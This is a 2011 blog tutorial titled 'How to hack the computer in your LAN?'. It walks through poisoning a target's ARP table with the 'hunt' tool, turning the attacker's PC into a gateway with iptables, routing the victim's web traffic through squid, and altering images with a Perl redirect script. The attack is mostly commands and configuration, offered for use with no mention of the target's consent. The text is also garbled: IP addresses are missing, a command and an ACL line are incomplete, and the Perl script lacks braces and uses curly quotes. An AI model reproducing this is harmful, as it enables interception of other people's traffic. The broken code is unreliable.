Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Tuesday, March 22, 2011

How to hack the computer in your LAN?

This is what we want to do:
  • Make the target send all http packet to us instead of the gateway
  • Forward them to the real gateway
  • Modify the replay, with the pictures upside-down
  • Forward the replay to the target
This is how we’re going to do it:
  1. Poison the ARP table of the target
  2. Set up our pc as a gateway router
  3. Send all http requests through a squid proxy
  4. Turn images upside-down with a squid script

Ok, sound great, lets get started!

1. Poison the ARP table of the target
We want the target to send all packets to us instead of the real gateway. To do this we need to know a little about ip addresses and mac addresses. When we wan to send a packet to, there is sent out an ARP request on the local lan, saying “Which computer is at”, then answers with an ARP repay “I am at, with mac address 11:22:33:44:55:66″. 

Then we send the packet to 11:22:33:44:55:66. ARP replays are cached in a local ARP table, so the next time we want to send to, we don’t need to ask who’s got it. We are going to send a fake ARP replay to the target (, saying we are at Usually ARP replays are accepted even though no request was sent, so this is actually really easy.
How do I do this?
We can use arpoison to construct a fake packet and send it, but i prefer to use another a bit mor powerful script, called hunt. You can download the hunt source code here, and compile like this:

tar zxvf hunt-1.5.tgz
cd hunt-1.5

Fire up hunt:
sudo ./hunt
In the menu system go to
a) daemons rst/arp/sniff/mac
b) arp spoof + arp relayer daemon
c) insert single/range arp spoof
d) start/stop relayer daemon (press s)
Type in the ip of the real gateway, your mac address (find this by running ifconfig), and the targets ip. Now we have poisoned the ARP table of the target. You can confirm the poisoning by typing “arp -a” on the target, and see that the gateway ip has your mac address.

2. Set up our pc as a gateway router
This is easy, just do this commands:

sudo iptables -F
sudo iptables -F -t nat
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
Where eth0 is your network interface connected to the lan. The changes are reset the next time the network is reloaded.

3. Send all http requests through a squid proxy
Install squid and reset it’s config:

sudo apt-get squid
sudo mv /etc/squid/squid.conf /etc/squid/squid.conf.default
Edit /etc/squid/squid.conf with your favorite editor like this:

visible_hostname gateway.my.flat
cache_mgr proxy@foo.com

httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on

acl all src
http_access allow all
redirect_program /var/redirect

4. Turn images upside-down with a squid script
We use the redirect program defined in the squid config to flip our images, edit /var/redirect to look like this:

$count = 0;
$pid = $$;
while (<>) {
chomp $_;
if ($_ =~ /(.*\.jpg)/i) {
$url = $1;
system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/$pid-$count.jpg”, “$url”);
system(”/usr/bin/mogrify”, “-flip”,”/var/www/$pid-$count.jpg”);
system(”/bin/chmod”, “777″, “/var/www/$pid-$count.jpg”);
print “$pid-$count.jpg\n”;
elsif ($_ =~ /(.*\.gif)/i) {
$url = $1;
system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/$pid-$count.gif”, “$url”);
system(”/usr/bin/mogrify”, “-flip”,”/var/www/$pid-$count.gif”);
system(”/bin/chmod”, “777″, “/var/www/$pid-$count.gif”);
print “$pid-$count.gif\n”;

else {
print “$_\n”;;
As you can see from the script, we need to serve the flipped images from a local webserver. Therefore, install apache:
sudo apt-get install apache2
sudo chmod -R 777 /var/www
At last, reload squid with the new configuration:
sudo /etc/init.d/squid restart
You can test the squid by configuring your firefox to use localhost:8080 as a proxy server.


You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.


Post a Comment

Back to Top